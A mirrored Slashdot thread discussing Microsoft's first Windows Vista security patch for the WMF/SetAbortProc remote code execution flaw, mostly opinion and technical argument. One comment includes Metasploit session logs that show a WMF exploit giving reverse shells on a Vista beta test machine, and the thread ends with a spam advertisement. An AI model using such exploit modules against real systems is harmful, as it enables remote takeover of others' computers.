Slashdot Mirror
First Windows Vista Security Update Released
Bard Of Vim writes "Microsoft has issued critical security patches for beta testers running the Windows Vista December CTP (Community Technology Preview) and Windows Vista Beta 1, and warned that the new operating system was vulnerable to a remote code execution flaw in the Graphics Rendering Engine. The Vista patches address the same vulnerability that led to the WMF (Windows Metafile) malware attacks earlier this month. The recent out-of-cycle security update for the WMF vulnerability (see slashdot coverage) makes no mention of Windows Vista being vulnerable, but with the release of this weekend's patches it is clear that the poorly designed 'SetAbortProc,' the function that allows printing jobs to be canceled, was ported over to Vista."
What a hell is happening on Microsoft? They have a major Windows version upgrade and they don't even audit their portable old code for such things?! I would get a someone responsible about security in Windows Vista fired ASAP.
How they think will be migration from old versions of Windows if such things will countinue to happen? Yeah, I know, OEM will have Vista and that's all. But with Web applications my pick is that lot of enterprises will stick with their Windows 2000/XP.
No doubt that Microsoft will have hard time to make Vista as smash hit as they would like it to be.
user@ubuntubox:~$ stfu This server is going down for shutdown NOW!
...they're fixing bugs before they release. M$ is doing something right and actually attempting to release a more secure Windoze than XP.
They ported some functional code to their newest project. I hope they don't get unfairly bashed for this, just because a few bits of said code were discovered to be vulnerable. Every halfway intelligent programmer reuses code - it would be far more stupid not to. This is semi-interesting as a landmark ("frist patch!") but not exactly news because of what it contains.
Rex is 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0
that Windows Vista isn't going to be all the fresh, hot goodness that we've been promised? For their own sake, Microsoft should step away from their stale and horribly insecure old code bases. They've had enough time now to rewrite the OS a few times over but it seems they chose instead to shoehorn in their old crap. Now is as good a time as any to cut the Win 9x support cord.
The issue here is I think, that Microsoft continues to this day, to be rather sloppy and secretive about fixing their stuff. So if Gibson makes a big flap, so be it. Better that than a back door that MSFT doesn't bother to fix, because they don't consider it a "critical vulnerability" or some other excuse. As Gibson points out, no question this is highlighting one of the main benefits of open source - the source is there for all to see, no dickering about whether it was intentional or not, it gets fixed. Period.
Software Wars
/dev/random
.... will probably call itself 'Hasta la vista, baby!'.
Sorry, couldn't resist, please ignore...
A World in a Grain of Sand / Heaven in a Wild Flower,
Infinity in the Palm of your Hand / And Eternity in an Hour.
> Unpriveleged access will be the default, and it'll be damn near impossible to breach Yes, because of the hardware-level DRM chips it will be impossible. The next few Windoze OSes will be much more secure, not only from the outside, but from the user.
I find it completely amusing not that this is a security bug that lets someone compromise your computer, but that it's the "Graphics Rendering Engine". I wonder how good it is for doing things like, you know, rendering graphics.
Like I said once years ago, if edlin were written today, it would have direct access to kernel-level functions through scripting and be a vector for both viruses and remote exploits.
You are in a maze of twisty little passages, all alike.
"poorly designed 'SetAbortProc,' the function that allows printing jobs to be canceled, was ported over to Vista."
SetAbortProc is well designed. The problem is the code that handles the WMF. That code is allowing a payload to be placed on the stack and an incorrect pointer to be sent.
All set abort proc does is send an abort code to the print job and set a call back method to call when the abort completes.
-Rick
"Most people in the U.S. wouldn't know they live in a tyrannical state if it walked up and grabbed their junk." - MyFirs
Yes, and Gibson is well known for *not* being an open source advocate, quite the opposite. So for him to start swinging towards open source is really a big thing.
This says more about Redhat FC than Microsoft, in this case. Just about weekly there is discovered a new local root vulnerability in the Linux kernel, and having dozens of those in the last year or so does not speak well of Linux security.
I posted something about Vista being vulnerable to the WMF thing in a Vista Kernel post here not long ago. They got a little mad at me but that is okay. Everyone has to be mad at someone!
People were telling me you can't automatically exploit it but I fired up metasploit and was successful with the admin account and a non-priv account.
Administrator
msf ie_xp_pfv_metafile(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://10.1.1.101:8080/
[*] HTTP Client connected from 10.1.1.106:49450, redirecting...
[*] HTTP Client connected from 10.1.1.106:49451, redirecting...
[*] HTTP Client connected from 10.1.1.106:49452, redirecting...
[*] HTTP Client connected from 10.1.1.106:49453, sending 1864 bytes of payload...
[*] Got connection from 10.1.1.101:4321 10.1.1.106:49454
Microsoft Windows [Version 6.0.5112]
(C) Copyright 1985-2005 Microsoft Corp.
E:\Users\Administrator\Desktop>
Test account
msf ie_xp_pfv_metafile(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://10.1.1.101:8080/
[*] HTTP Client connected from 10.1.1.106:49487, redirecting...
[*] HTTP Client connected from 10.1.1.106:49488, redirecting...
[*] HTTP Client connected from 10.1.1.106:49489, sending 1864 bytes of payload...
[*] Got connection from 10.1.1.101:4321 10.1.1.106:49490
Microsoft Windows [Version 6.0.5112]
(C) Copyright 1985-2005 Microsoft Corp.
E:\Users\test\Desktop>
I am wondering what else they are going to import from the old technology. I was a Windows fan up until this WMF dealio. I work in an Information Security office and all of our staff are going to Mac. Ordered them Friday!
Fixing bugs in a pre-beta OS under development is indicative of this? Then a changelog of Linux or OS/X beta will scare you good.
entertaining. Google "beta" products that are used by millions have huge security bugs that let malicious persons read anyone's email and nobody says much and it is swept under the rug. Microsoft's "beta" products that are only in use by testers/developers have a security issue and everybody's shaking their head and talking about how horrible MS is. It's just amusing to me.
Say what???
- 2005-3257 Date? 2005-10-17
- 2005-2490 (and 2492, both with sendmsg) Date? 2005-09-09
- 2005-1768 Date? 2005-07-11
Just about weekly? I beg to differ. Last local root exploit:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE
The one before:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN
How about the one before?
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN
Perhaps you'd like to backup your claim?
Dozens? No. Several? Yes. Dozen? About that. How many would M$ products have if as many eyes analyzed it relentlessly? A metric assload. Take the partial 2k source code for an example.
...that Longhorn (now Vista) is completly new design... from scratsh... none of the earlier flaws would be ported to it ? ...or are they full of shit as usual ?
Do I remember wrong ?
With regards to Vista, it's a valid question. Remember that Microsoft is introducing all sorts of brand new version 1.0 APIs. They had to cancel Vista Beta 2 in favor of CTPs due to their rushed schedule, and they missed their Feature Complete deadline of December and are now aiming for the end of the month. Vista will suffer from reduced testing unless it is delayed to early 2007 (something I believe is likely to happen later this year).
.NET framework. Photoshop, Dreamweaver, Maya, etc. will be Win32 forever.
Contrary to popular belief, Vista isn't some big rewrite. It's the same Windows as before with some architectural changes and new API layers. But the old Win32 stuff is still in there.
Wait 'til you guys see the fun way Vista gets older apps to run that expect admin privileges--it emulates a virtual filesystem and all sorts of other crazy things. My impression of Vista is that instead of a clean redesign, it's more layers of updates and APIs on the creaky building. As for WinFX, none of the major apps are going to rewrite their big applications just to go to the slow
I believe there are plenty of reasons to be concerned about Vista. OS X had the advantage of totally starting over and just porting over the old toolbox APIs and calling it Carbon to get older apps to come along. Vista is a weird blend of old cruft and new less-tested code, complete with suspiciously high system requirements. But hey, at least they got shadows on their windows now--I've only been seeing that for five years from Apple.
"Sufferin' succotash."
Actually, .NET 2.0 runs on everything short of Win95 AFAIK. Vista isn't about .NET 2.0 whatsoever, it's about a bunch of other new technologies:
.NET 2 and that people don't care about that is uninformed at best...
WPF: Windows Presentation Framework ("avalon"; using XAML): what WinFX and the new AERO Shell are based onto;
WCF: Windows Communication Foundation ("indigo": an enhancement to Web Services, MSMQ, etc);
WWF: Windows Workflow Foundation, to help take care of scenarios like the one that was asked on "ask.slashdot.org" just yesterday. Something that's becoming increasingly common/important nowadays.
People like to just dismiss Vista like it has nothing new or worthwhile, ignoring all the new stuff that actually IS there, not just the previous 3 things mentionned, but there's a great deal of other changes (video drivers not in kernel mode anymore, new audio and printing (both work quite differently), GUI rendered by the
There are differences. It may not be worthwhile to everyone, but as a programmer I'm looking forward to many of these advances (WCF seems really nice). Saying Vista is about
///<sig
Well I kinda summed it up a bit too much but my point is that *users* won't care about such technologies. I, as a developer, think they might be nice (but as I'm switching over to Linux I don't care too much); users won't. I was not saying Vista is stupid or limited; I was saying users will not perceive it as worth much more than XP. Then of course if developers force them to use Vista, that's another story...
Global warming is a cube.
Yes, I did order Macs for all of our staff (except for one that already has a Mac) so that means we will have 4 Macs in the office.
I have used Microsoft since Dos 4.0 as well as other operating systems. This is the first time I got nervous just surfing the web. There have always been some kind of workaround. In this case there wasn't a good workaround for the zero day exploits that were all over the place. The crappy workaround M$ recommended wasn't a good workaround at all. If you disabled the crappy dll they suggested it is still possible for you to get compromised. There has been talk that some other programs would re-registere the crappy dll and any images you had stored in memory would be executed. Microsoft downplayed this just a bit too much for me. We have over 35,000 computers and we had students coming back the Friday before patch-tuesday. So, this was pretty bad. They did end up releasing the patch that Friday. Okay, I can live with that. *whew*
Now, the fact that this same vulnerability was found in the new and secure Windows Vista just did it for me. That was the point I stopped being a Microsoft advocate.
Yours truly,
blast3r the newb
Now people are making fun of microsoft for porting this over to vista! Do any of you know what it is. If you are a graphics designer you probably should know what it is. Look it up graphics designers and web designers love vector graphics. This is the file that allows windows to draw vector and bitmap images on pre 2000 systems, though it is still included for backwards compatability.
A metafile is a list of commands that can be played back to draw a graphic. Typically, a metafile is made up of commands to draw objects such as lines, polygons and text and commands to control the style of these objects. NOTE: Some people equate metafiles with vector graphics. In most cases this is fine; but, strictly speaking, a metafile can contain any mix of vector and raster graphics. For example, a metafile could contain just one command to display a bitmap! Unless the distinction is important, we will consider a metafile to be a kind of vector graphic.
The reason it was still included is cause it is technically a file format! Do you rewrite everything in linux? Was php totally rewritten from the ground up from php4 to php5 i don't think so.
Just my take on things!
I am giving away 2000 premium accounts on my new dating website myfantasyromance.com check it out!